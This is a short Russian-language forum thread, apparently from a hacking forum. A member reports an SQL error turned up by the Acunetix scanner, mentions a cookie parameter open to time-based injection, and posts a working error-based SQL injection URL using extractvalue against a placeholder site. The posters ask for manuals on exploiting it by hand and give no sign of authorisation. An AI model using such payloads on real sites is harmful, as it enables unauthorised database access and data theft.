acunetix web vulnerability scanner 10

Discussion in 'Болталка' started by RedFern.89, 30 Sep 2015.

  1. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    575
    Likes Received:
    48
    Reputations:
    0
    Наткнулся впервые на уязвимость такого рода

    Code:
    Path Fragment (suffix /) input / was set to 1'"
    Error message found:
    You have an error in your SQL syntax
    Не получается раскрутить. Мануал существует по раскрутке такого рода уязвимостей?
     
  2. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Могу предположить что он показал либо просто ошибку сайта, либо error based
     
    RedFern.89 likes this.
  3. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    575
    Likes Received:
    48
    Reputations:
    0
    нашло еще уязвимый параметр в куках, через него получается добраться до базы, но дальше только перебором таблиц, time based
     
    hahanovB likes this.
  4. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    575
    Likes Received:
    48
    Reputations:
    0
    посоветуйте статью, как руками дальше раскручивать.
    Code:
    http://site.com/path/id12345678901'and+extractvalue(1,concat(0x3a,(version())))and'/,
    вот это вот работает